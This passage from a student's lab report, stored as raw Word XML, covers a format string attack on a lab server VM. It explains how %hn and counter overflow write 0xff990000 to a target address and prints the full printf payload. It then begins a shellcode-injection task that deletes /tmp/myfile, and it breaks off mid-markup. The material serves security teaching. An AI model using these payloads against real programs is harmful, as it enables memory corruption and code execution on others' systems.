        <w:t>Change the value to 0xFF99000</w:t>
      </w:r>
      <w:r w:rsidR="008B02D8" w:rsidRPr="0009496B">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252B3ED1" w14:textId="77777777" w:rsidR="00A80A59" w:rsidRDefault="00A80A59">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07159B97" w14:textId="28A627BB" w:rsidR="00A80A59" w:rsidRDefault="00FA7CE6">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CCBA4F5" wp14:editId="479134DF">
            <wp:extent cx="5939790" cy="574040"/>
            <wp:effectExtent l="0" t="0" r="3810" b="10160"/>
            <wp:docPr id="81" name="Picture 81" descr="../../../../Desktop/Screen%20Shot%202018-10-17%20at%209.5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8-10-17%20at%209.52.3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574040"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F25E1FF" w14:textId="32A2BE84" w:rsidR="00163BF7" w:rsidRDefault="00B97693">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>screenshot1</w:t>
      </w:r>
      <w:r w:rsidR="00163BF7">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>we make the message and send it to the server VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734DA0E1" w14:textId="77777777" w:rsidR="00163BF7" w:rsidRDefault="00163BF7">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D3B9A34" w14:textId="705B3FB3" w:rsidR="00163BF7" w:rsidRDefault="00940831">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12E5D81E" wp14:editId="3E6629B8">
            <wp:extent cx="5924550" cy="1942465"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13" name="Picture 13" descr="../../../../Desktop/Screen%20Shot%202018-10-20%20at%204.4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0-20%20at%204.48.3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4550" cy="1942465"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F1FD93" w14:textId="737B1C25" w:rsidR="00163BF7" w:rsidRDefault="00B97693">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>screenshot2</w:t>
      </w:r>
      <w:r w:rsidR="00163BF7">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>, we go back to the server, and we see the target value is changed to 0xff990000. So our attack succeeds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196B260B" w14:textId="77777777" w:rsidR="0096719E" w:rsidRDefault="0096719E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E9F29DF" w14:textId="7B161A7D" w:rsidR="0096719E" w:rsidRPr="0096719E" w:rsidRDefault="0096719E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096719E">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Observation and Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5BD1F8" w14:textId="134EB101" w:rsidR="00163BF7" w:rsidRDefault="0096719E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">In this task, we want to modify the target value to 0xff990000. This task is similar to last one, but this time we have a very large number. So if we still use “%.dx” to write character to reach 0xff990000, this d will be very large, and this will take a lot of time. So we need some faster approach. The approach is that we separate 0xff990000 to two part, one is ff99, the other one is 0000. And we put them in two different memory addresses. We know the target value’s address is 0x0804a040, so we put </w:t>
      </w:r>
      <w:r w:rsidR="00771CC3">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>lower two bytes (0x0000)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00771CC3">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> there; and we put </w:t>
      </w:r>
      <w:r w:rsidR="00771CC3">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>higher two bytes (0xff99)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00771CC3">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0x0804a042.</w:t>
      </w:r>
      <w:r w:rsidR="00D35409">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FA7CE6">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Because we want </w:t>
      </w:r>
      <w:r w:rsidR="00771CC3">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">to write </w:t>
      </w:r>
      <w:r w:rsidR="00FA7CE6">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00771CC3">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> bytes at a time, we cannot use specifier “%n” because it writes 4 bytes at a time. Fortunately, we have a modified version of “%n” which is “%hn”, by using this specifier we can write 2 bytes at a time.</w:t>
      </w:r>
      <w:r w:rsidR="001C2466">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BE5BAD">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Moreover, in the format string attack</w:t>
      </w:r>
      <w:r w:rsidR="009A1930">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00BE5BAD">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> to change the content of memory to a very small value is pretty difficult. When we use %n or %hn, it will print current number of character counter; so the value of the counter can only be increased, not decreased. Therefore, it is not easy to go back to a small value if we already reach a large number. </w:t>
      </w:r>
      <w:r w:rsidR="00023472">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>But we can</w:t>
      </w:r>
      <w:r w:rsidR="00BE5BAD">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> use a technique which called overflow. When a numb</w:t>
      </w:r>
      <w:r w:rsidR="009A1930">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>er X is greater than 2^16 (65536), then only X – 65536</w:t>
      </w:r>
      <w:r w:rsidR="00BE5BAD">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> will be write in the m</w:t>
      </w:r>
      <w:r w:rsidR="009A1930">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>emory. For example, if X = 65536</w:t>
      </w:r>
      <w:r w:rsidR="00BE5BAD">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> + 500, then only 500 will be write by %hn. So to write 0x0000 in memory, we ma</w:t>
      </w:r>
      <w:r w:rsidR="009A1930">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ke the counter to reach to 65536</w:t>
      </w:r>
      <w:r w:rsidR="00BE5BAD">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="001C2466">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">After some investigation and calculation, we get our input message </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733AD142" w14:textId="6CDC852E" w:rsidR="001C2466" w:rsidRPr="00F401BE" w:rsidRDefault="001C2466">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F401BE">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>echo $(printf "\x42\xa0\x04\x08@@@@\x40\xa0\x04\x08")%.8x.%.8x.%.8x.%.8x.%.8x.%.8x.%.8x.%.8x.%.8x.%.8x.%.8x.%.8x.%.8x.%.8x.%.8x.%.8x.%.8x.%.8x.%.8x.%.8x.%.8x.%.8x.%.65223x%hn.%.102x%hn &gt; input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F3C429" w14:textId="01C0F792" w:rsidR="00A001CE" w:rsidRDefault="00F401BE">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">The first part is </w:t>
      </w:r>
      <w:r w:rsidRPr="00F401BE">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>"\x42\xa0\x04\x08@@@@\x40\xa0\x04\x08</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>, this string contains two address,</w:t>
      </w:r>
      <w:r w:rsidR="003378D0">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> and these two addresses will be stored in the </w:t>
      </w:r>
      <w:r w:rsidR="00EF61A5">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>buf[]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00802E8A">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">“@@@@” we will talk about it later. The next part </w:t>
      </w:r>
      <w:r w:rsidR="00802E8A" w:rsidRPr="00280B16">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>“%.8x……%.8x”</w:t>
      </w:r>
      <w:r w:rsidR="00802E8A">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> is same as </w:t>
      </w:r>
      <w:r w:rsidR="00FA7CE6">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>previous</w:t>
      </w:r>
      <w:r w:rsidR="00802E8A">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> task</w:t>
      </w:r>
      <w:r w:rsidR="00FA7CE6">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00802E8A">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">, we use </w:t>
      </w:r>
      <w:r w:rsidR="00FA7CE6">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>them</w:t>
      </w:r>
      <w:r w:rsidR="00802E8A">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> to move the var_list point to the target addresses which are stored in the </w:t>
      </w:r>
      <w:r w:rsidR="00EF61A5">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>buf[]</w:t>
      </w:r>
      <w:r w:rsidR="00802E8A">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">. Then we need to calculate the “d” value, for the first part address which is “0xff99”, the decimal value is 65433. Before this point, the prinf() has printed some characters, they are addresses (12 bytes), %.8x (22*8 = 176), “.” (22), so the total is 210. Therefore, we need to write (65433 - 210) = 65223 bytes. And we use </w:t>
      </w:r>
      <w:r w:rsidR="00802E8A" w:rsidRPr="00AD7488">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>“%.65223x”</w:t>
      </w:r>
      <w:r w:rsidR="00802E8A">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> to reach this number, then we use “%hn” to write 0xff99 to address 0x08041042. Because if we use “%hn” to move the pointer to the second address, the same value will be written to that address. However, we still need to increase the </w:t>
      </w:r>
      <w:r w:rsidR="002C7096">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>printed character number to reach 0x0000. Therefore, we insert “@@@@” between these two addresses; after we done on first part address, the pointer will point to “@@@@”, and “%x” will print it out</w:t>
      </w:r>
      <w:r w:rsidR="00FA7CE6">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> which is 40404040</w:t>
      </w:r>
      <w:r w:rsidR="002C7096">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>, and then the pointer will move to second address.</w:t>
      </w:r>
      <w:r w:rsidR="00975DDF">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> For the second address, our target is 0x0000, we can use overflow to increase the character count to 65536, so this time we need (65536 – </w:t>
      </w:r>
      <w:r w:rsidR="00E80738">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">65433 - 1 </w:t>
      </w:r>
      <w:r w:rsidR="00AD7488">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>= 10</w:t>
      </w:r>
      <w:r w:rsidR="00DF0DEA">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00975DDF">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">), the 65536 is 2^16 which is the overflow point, if we write this number to the memory, it will become 0000. </w:t>
      </w:r>
      <w:r w:rsidR="00E80738">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">65433 </w:t>
      </w:r>
      <w:r w:rsidR="00975DDF">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>is the current value of the character counter, and the 1 is the dot between these two addresses.</w:t>
      </w:r>
      <w:r w:rsidR="00C72C96">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> After send the message to the server, we see the target value becomes 0xff990000 (screenshot3). Our attack is successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B94EE9" w14:textId="77777777" w:rsidR="00A001CE" w:rsidRDefault="00A001CE">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77A79748" w14:textId="77777777" w:rsidR="00940831" w:rsidRDefault="00940831">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73639CAA" w14:textId="77777777" w:rsidR="00940831" w:rsidRDefault="00940831">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B150E59" w14:textId="3830DF2D" w:rsidR="00A001CE" w:rsidRPr="00EB22FE" w:rsidRDefault="00A001CE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB22FE">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Task6: Inject Malicious Code into the Server Program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E8E1F3" w14:textId="0B3611FF" w:rsidR="00A001CE" w:rsidRDefault="00B15A3A">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6188DD8E" wp14:editId="7CD4B468">
            <wp:extent cx="3480435" cy="721836"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="90" name="Picture 90" descr="../../../../Desktop/Screen%20Shot%202018-10-17%20at%2010.0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8-10-17%20at%2010.02.0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97486" cy="725372"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6A61FC" w14:textId="1FD26C94" w:rsidR="00A82D9D" w:rsidRDefault="00A82D9D">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>screenshot1, we create /tmp/myfile on the server VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABDB58E" w14:textId="77777777" w:rsidR="005D2AFE" w:rsidRDefault="005D2AFE">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AEB1227" w14:textId="02641976" w:rsidR="005D2AFE" w:rsidRDefault="005D2AFE">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E6360E5" wp14:editId="751AD93D">
            <wp:extent cx="3709035" cy="1741113"/>
            <wp:effectExtent l="0" t="0" r="0" b="12065"/>
            <wp:docPr id="6" name="Picture 6" descr="../../../../Desktop/Screen%20Shot%202018-10-20%20at%203.4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0-20%20at%203.46.26%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16238" cy="1744494"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="779F283D" w14:textId="70C0DB11" w:rsidR="00571015" w:rsidRDefault="005D2AFE">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">screenshot2, </w:t>
      </w:r>
      <w:r w:rsidR="00571015">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">we output </w:t>
      </w:r>
      <w:r w:rsidR="00EF61A5">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00571015">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> message</w:t>
      </w:r>
      <w:r w:rsidR="00D8211B">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> (this format string is not </w:t>
      </w:r>
      <w:r w:rsidR="00DA2458">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00D8211B">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>he final version)</w:t>
      </w:r>
      <w:r w:rsidR="00571015">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> to a file, and then we check the location of shel</w:t>
      </w:r>
      <w:r w:rsidR="00341D5E">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>lcode in the message, it is 0xa4</w:t>
      </w:r>
      <w:r w:rsidR="00571015">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> away from the beginning of buf[]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54ED9C9B" w14:textId="57602E05" w:rsidR="005210CA" w:rsidRDefault="00B15A3A">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A945BC1" wp14:editId="6CC8332D">
            <wp:extent cx="5939790" cy="1609725"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="91" name="Picture 91" descr="../../../../Desktop/Screen%20Shot%202018-10-17%20at%2010.0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8-10-17%20at%2010.02.2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1609725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DE5E99" w14:textId="77F96942" w:rsidR="00A82D9D" w:rsidRDefault="0014440E">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>screenshot3</w:t>
      </w:r>
      <w:r w:rsidR="00A82D9D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>, we run the server program on the server VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1204ACF2" w14:textId="77777777" w:rsidR="00A82D9D" w:rsidRDefault="00A82D9D">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46DBF132" w14:textId="79BF254F" w:rsidR="004E06E1" w:rsidRDefault="00B15A3A">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BEFF56C" wp14:editId="7CA05492">
            <wp:extent cx="3823335" cy="933966"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="92" name="Picture 92" descr="../../../../Desktop/Screen%20Shot%202018-10-17%20at%2010.0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8-10-17%20at%2010.03.0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27795" cy="935056"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B81A8A9" w14:textId="3E375EAC" w:rsidR="00A82D9D" w:rsidRDefault="00B80411">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D80B417" wp14:editId="3B33685C">
            <wp:extent cx="5924550" cy="1677670"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17" name="Picture 17" descr="../../../../Desktop/Screen%20Shot%202018-10-20%20at%204.5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0-20%20at%204.56.48%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1677670"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E357B8" w14:textId="7246446B" w:rsidR="004E06E1" w:rsidRDefault="004E06E1">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>screenshot</w:t>
      </w:r>
      <w:r w:rsidR="0014440E">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">, we </w:t>
      </w:r>
      <w:r w:rsidR="00C8588F">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">run the python program to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>send out the message to server. After server receive the message, the /tmp/myfile is deleted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C146D0A" w14:textId="77777777" w:rsidR="006F3E6B" w:rsidRDefault="006F3E6B">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46A80654" w14:textId="200B6BC6" w:rsidR="006F3E6B" w:rsidRDefault="00B80411">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="702250F1" wp14:editId="652A3A4C">
            <wp:extent cx="5924550" cy="1518920"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
